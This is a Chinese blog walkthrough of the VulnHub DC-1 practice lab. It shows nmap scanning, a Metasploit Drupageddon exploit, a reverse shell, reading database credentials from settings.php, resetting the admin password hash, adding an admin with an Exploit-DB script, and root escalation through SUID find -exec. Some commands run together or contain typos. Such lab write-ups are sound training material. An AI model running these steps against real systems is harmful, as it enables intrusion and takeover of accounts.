Vulnhub-DC-1

最新推荐文章于 2024-10-18 23:35:18 发布
最新推荐文章于 2024-10-18 23:35:18 发布
阅读量977 收藏 2
点赞数 3
分类专栏: Vulnhub 文章标签: Vulnhub DC
kaka
本文链接:https://blog.csdn.net/szlg510027010/article/details/106541167
版权

配置信息:
靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/
靶机:DC1 (VirtualBox)    IP:192.168.67.200
攻机:Kali  (Local)             IP:192.168.67.109

目标:获取5个flag

开始游戏:

nmap -sn 192.168.67.0/24

获取目标IP地址:192.168.67.200

扫描目标信息:

nmap -A -p- 192.168.67.200

获取目标开放端口:22 [ssh] || 80[http] || 111[rpc]

获取目标系统信息:Linux 3.2 - 3.16

发现开放80端口,因此尝试登录网页,浏览器输入:http://192.168.67.200

左上方发现CMS为Drupal

CMS:Drupal7

Web servers:Apache2.2.22

Programming languages:PHP5.4.45

Operating system:Debian

JavaScript libraries:JQuery1.4.4 jQuery UI1.8.7

使用 wappalyzer 插件确认获取网站相关信息:

注:Wappalyzer是一款能够分析目标网站所采用的平台构架、网站环境、服务器配置环境、JavaScript框架、编程语言等参数的网站技术分析插件

确认 CMS 为 Drupal,利用msfconsole获取meterpreter:(use rank:excellent)

search drupaluse exploit/multi/http/drupal_drupageddonshow optionsset RHOSTS 192.168.67.200exploit

在meterpreter下获取交互式反弹shell:

meterpreter > shellpython -c 'import pty;pyt.spawn("\bin\sh")'$ ls

输入命令 ls 发现有一个 flag1.txt,果断查看它,这就得到了flag1

$lslsCOPYRIGHT.txt       MAINTAINERS.txt  includes     robots.txt  web.configINSTALL.mysql.txt   README.txt       index.php    scripts     xmlrpc.phpINSTALL.pgsql.txt   UPGRADE.txt      install.php  sitesINSTALL.sqlite.txt  authorize.php    misc         themesINSTALL.txt         cron.php         modules      update.phpLICENSE.txt         flag1.txt        profiles     user$cat flag1.txtcat flag1.txtEvery good CMS needs a config file - and so do you

每一个好的 CMS 都需要一个配置文件,你也如此。

根据falg1的提示,利用搜索引擎查询Drupal的配置文件?

得到一个地址:/sites/default/settings.php —— 利用 more 查看全部信息

获取 flag2,这就得到了第二个 flag2

$more sites/default/settings.phpmore sites/default/settings.php<?php/** * * flag2 * Brute force and dictionary attacks aren't the * only ways to gain access (and you WILL need access). * What can you do with these credentials? * */

暴力破解和字典攻击并不是取得访问权限的唯一方式(你需要访问权限),利用这些凭证你能做什么?

这是 flag2 给我们留下的信息,再回看该配置文件,会发现这里有关于数据库的详细信息:

$databases = array (  'default' =>   array (    'default' =>     array (      'database' => 'drupaldb',      'username' => 'dbuser',      'password' => 'R0ck3t',      'host' => 'localhost',      'port' => '',      'driver' => 'mysql',      'prefix' => '',    ),

尝试进入 mysql :

$ mysql -h localhost -u dbuser -pmysql -h localhost -u dbuser -pEnter password: R0ck3t

 

show databases;use drupaldb;show tables;select * from users;

查询有哪些表时,可以很明显的看到有 users 这个表,果断 select 一发再说

这就得到了用户名和一串奇奇怪怪的密码,再次利用搜索引擎,可搜索:drupal7忘记密码怎么办?drupal7如何重置密码?drupal7如何修改密码?类似这些问题,让开发者或研究人士告诉我们答案

还真告诉了,直接重置管理员密码登录。

exit$ls$php ./scripts/password-hash.sh 123456mysql -h localhost -u dbuser -pEnter password:R0ck3tuse drupaldb;update users set pass='$S$DQZsZLqxCbnNCRuvOFCQBC2snsbkjGrH3Xw4nqxxhuYIONkuC4dP' where name='admin';

登录成功

有时直接修改太过明目张胆,那么有没有较隐蔽的方法呢?有什么比较隐蔽的方法能够也是以管理员的身份去登录的呢?要不试试添加一个管理员帐号?

首先得知道版本号,看能否利用,一般在modules/system/system.info可以看到版本号,如果不知道,利用搜索引擎也可得知这一信息:

cat modules/system/system.info

得到该Drupal的版本为7.24

在kali上查询是否存在添加管理员漏洞可利用:

searchexploit drupal

发现有 Add Admin User 可以利用且版本符合条件

copy一份到家目录下,随后添加一个具有管理员权限的账户

cp /usr/share/exploitdb/exploits/php/webapps/34992.py /root/34992.pycd ~python 34992.py -hpython 34992.py -t http://192.168.67.200 -u whoami -p 123456

登录成功

随后浏览页面[每个按钮都去点],看有无新发现,在find content找到了flag3

点击 flag3,可以获得flag3详细信息:

特殊的PERMS可以帮助找到密码-但您需要-exec该命令来隐藏的内容。

很明显的提示:find+perms+exec 命令用来提权

首先利用 find 命令查看有哪些 suid 命令:

find / -perm -4000

利用 find 提权,find 提权有两种方式:

/*这是第一种*/find ./ acce -exec '/bin/sh' \;

/*这是第二种*/touch bccefind bcce -exec '/bin/sh' \;

这就拿到了 root 权限,查找有无flag4

可以发现 flag4 是一个用户...

find / -name "flag4cd /home/flag4cat flag4.txt

你能利用同样的方法用root权限找到或访问到flag吗?

貌似我们已经进入了root环境下,竟然flag4在家母录下,那么flag5会不会在root目录下?

—— 找到 flag5:thefinalflag

游戏结束

总结:

0:MSF 漏洞模块利用

1:配置文件

2:搜索引擎的合理应用

3:提权

VulnHub DC-1
weixin_45682839的博客
04-13 460
VnlnHub DC-1靶场攻关攻略记录,五个flag,获得root权限。
vulnhubDC-1
BurYiA的博客
05-02 687
文章目录vulnhubDC-1准备工作1.主机查找2.信息搜集3.正文方法一方法二 vulnhubDC-1 大神们可以退场了,小白的第一篇文章,可能会有很多错误,很多地方可能也会说不清楚。望见谅。 前段时间了解到这个平台,然后就开始难受了,真心不会做(就是太菜了)。闲话就不多说了,开始吧 准备工作 1.DC-1虚拟机(可能得搭梯子,自行尝试) 2.kali虚拟机 1.主机查找 这个就是基本操作...
VulnHub系列(一)DC-1
2022年7月6日从博客园https://www.cnblogs.com/hugboy/ 学习记录博客。
05-08 3380
环境 kali linux 和 DC-1 都是搭建在VMware上的虚拟机,都是NAT模式。 主机发现 NAT模式下虚拟机没有被分配真实的ip地址,他们通过共享宿主机的ip地址访问互联网。我们可以通过它的MAC地址00:0C:29:23:E2:8D查到宿主机分配给他的虚拟ip。 arp-scan -l=>192.168.62.134 还有另一种方法,假设我们已经和目标在同一个局域网下:...
Vulnhub系列:DC-1
weixin_41064688的博客
01-09 726
Vulnhub系列:DC-1 第一次尝试写 Description DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. It was designed to be a challenge for beginners, b...
VulnHubDC-1
qq_45434762的博客
03-21 929
先进行一个粗糙的端口扫描首先我们对靶机所开放的端口进行扫描,发现有22,80,111端口开放Flag1既然开放了80端口,进去看看发现是Dupal CMS没有什么想法,现在MSF中搜一...
Vulnhub - DC-1
qq_46081990的博客
03-14 481
Nmap扫描目标主机,发现开放22、80、111、40884端口,分别运行OpenSSH 6.0p1、Apache httpd 2.2.22、rpcbind 2-4服务。MSF搜索Drupal,使用payload:exploit/unix/webapp/drupal_drupalgeddon2,成功拿到Web权限www-data。查询GTFOBins得知find的SUID提权方式如下,启用一个新的root权限的bash。上传综合辅助探测脚本LinEnum.sh至目标主机/tmp目录下,给予执行权限执行。
Vulnhub-DC 7-9 提权、端口敲门
2301_80115097的博客
04-28 1209
Vulnhub是一个提供了很多漏洞环境的靶场平台,其中的环境基本上都是做好的虚拟机镜像文件,需要使用VMware或者是VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚拟机到获取操作系统的root权限和查看flag。靶场部署Vulnhub官网:https://www.vulnhub.com下载地址:https://www.vulnhub.com/entry/dc-8,367/直接从官网下载做好的虚拟机镜像文件(我下载的Mirror版本);
VulnHub-DC-1靶机渗透测试和相应的知识点总结
qq_45584159的博客
12-15 1601
文章目录前言一、探测目标主机的ip1.使用arp-scan -l 命令,来探测同一局域网内的存活主机。2.使用netdiscover -i eth0二、使用namp扫描目标主机的开放端口,并通过开放端口得到更多的信息三. .Metasploit漏洞利用msf的简单使用:术语:模块:基础指令:模块使用规则:msf中大多数命令:第一步.启动msf:第二步.搜索drupal可利用的漏洞第三步,采用最新的2018漏洞尝试攻击,配置参数第四步,反弹shell四. 进入数据库第一步.进入数据库 前言 这是我第一次使用
Vulnhub-DC-1靶机渗透练习
weixin_52451257的博客
11-15 4290
DC-1 第一步:信息收集 nmap -sn 192.168.231.0/24 (进行存活主机发现) nmap -A -p- 192.168.231.142 (进行针对靶机的详细信息收集查看靶机开放了那些端口) dirb -http://192.168.231.142 nikto -h http://192.168.231.142 (敏感信息发现,cms是drupal7.0版本) 第二部:漏洞利用 msf 搜索关于drupal的相关漏洞. 我可能是歪打正着,上...
vulnhub-DC系列通关记DC1靶机渗透
qq_35258210的博客
02-07 1787
目录 flag1 信息收集 漏洞利用 后渗透 flag2 flag3 flag4 最终flag 该流程图出于:https://blog.csdn.net/weixin_44288604/article/details/108027062 本次学习参考于b站千峰机构的网络安全视频:https://www.bilibili.com/video/BV1i7411G7vm?p=268 这张流程图做得很好借来用用。如有侵权请告知删除 flag1 首先我们在启动DC1靶机后进入到系统只显示
vulnhub靶场——DC-1
pigzlfa的博客
08-12 798
下载后解压得到一个ova文件,直接vmware打开(这里我workstation pro17导入会报错,“未通过ovf规范一致性或虚拟硬件合规性检查”没留下截图,查了好多,最后点了重试,结果就就好了- -)这里把靶机和攻击机用同一种模式连接(都是NAT或者都是桥接),保证俩在同一网段,攻击机能访问到就行。有问题,问百度,so,目标有了,去找/sites/default/settings.php。整理一些思路,目前知道了一个flag4的账户,密码未知,还提示让提权root。
VulnHubDC-1
weixin_39219503的博客
01-29 312
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-1,292/ 题目信息如下,环境中有flag文件,里面有hint DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. ...
vulnhub靶场实战:DC-1
huangyongkang666的博客
04-18 4779
vulnhub实战:DC-1 1.DC-1介绍 DC-1是一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。 它旨在为初学者带来挑战,但它的容易程度将取决于您的技能和知识以及您的学习能力。 要成功完成此挑战,您将需要Linux技能,熟悉Linux命令行以及具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。 有多种方法可以获得root,但是,我包含了一些包含初学者线索的标志。 总共有五个flag,但最终目标是在root的主目录中找到并读取
Vulnhub 靶机DC-1
Lee_yc的博客
08-18 303
扫描局域网中的IP地址,确定靶机ip arp-scan -l
VulnHub-DC-1靶机
weixin_52710247的博客
10-18 941
VulnHub-DC-1靶机详细渗透过程
Vulnhub靶机渗透测试——DC-1
Cobra的博客
04-12 2657
Vulnhub靶机渗透测试实战——DC-1 一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu): 192.168.189.172] 二、信息收集 1、使用nmap扫描进行主机发现 nmap 192.168.189.0/24 2、发现IP为192.168.189.172主机开放80和22等端口,访问其80端口 三、漏洞利用 1、发现该站点是由Drupal搭建,利用msf进行漏洞利用 use exploit/unix/webapp/drupal_drupalgedd
vulnhubDC1靶机
LainWith的博客
08-15 1323
靶机概览信息收集nmap信息收集网站信息收集使用nikto来收集一下渗透攻击查找漏洞 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-1,292/ 靶机界面: 信息收集 由于我这里采用了NAT,所以很容易确定目标机器,如果你的网络环境里有众多机器,并且系统版本与靶机相似,且不方便更换连接虚拟机的方式,你可以先查看一下DC1的MAC,这样做主机发现时可以通过MAC来过滤靶机。 nmap信息收集 1:使用nma.
vulnhub靶机DC-1
最新发布
02-08
### VulnHub DC-1 靶机 攻略 介绍 #### 下载地址 VulnHub是一个提供各种虚拟机镜像用于安全测试和学习渗透测试技巧的平台。对于DC-1靶机,可以在[VulnHub官网](https://www.vulnhub.com/)搜索并下载该靶机镜像文件。 #### 初始信息收集 在启动DC-1之后,通过网络扫描工具如`nmap`来发现开放端口和服务版本是非常重要的初步操作[^2]。这有助于了解目标系统的潜在弱点所在之处。 ```bash nmap -A <target_ip> ``` #### Web应用漏洞探测 一旦确认存在Web服务运行于特定IP地址之上,则可以采用专门针对WordPress站点的安全评估工具WPScan来进行进一步的信息挖掘工作: ```bash wpscan --url http://<target_ip>/wordpress/ ``` 此命令能够帮助识别可能存在的插件或主题中的已知漏洞,并尝试获取管理员用户名列表等有用情报[^1]。 #### 获取初始访问权限 当已经掌握了某些关于网站后台管理账号线索后(比如默认用户名),可借助Hydra这样的暴力破解程序配合常用密码字典对登录界面发起攻击以期获得合法凭证进入内部环境: ```bash hydra -L /usr/share/wordlists/usernames.txt -P /usr/share/wordlists/passwords.txt ssh://<target_ip> ``` 这里假设SSH服务对外开放并且允许远程登陆;实际过程中还需根据具体情况调整相应参数设置[^3]。 #### 提升权限至root级别 成功创建Meterpreter会话意味着获得了较为深入的目标主机控制权,在此基础上继续探索其他未授权区域直至找到可用于提升当前用户权限的方法。例如,如果遇到弱配置下的Sudoers文件或是设置了简单密码的辅助账户,都可以成为突破口之一[^5]: ```bash sudo -l # 查看是否有无需密码即可执行高权限指令的情况 whoami # 确认当前身份 su admin # 尝试切换到更高权限用户 ``` 以上就是有关如何攻克VulnHub平台上名为DC-1这一挑战性实验项目的概览描述以及部分关键技术要点提示。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值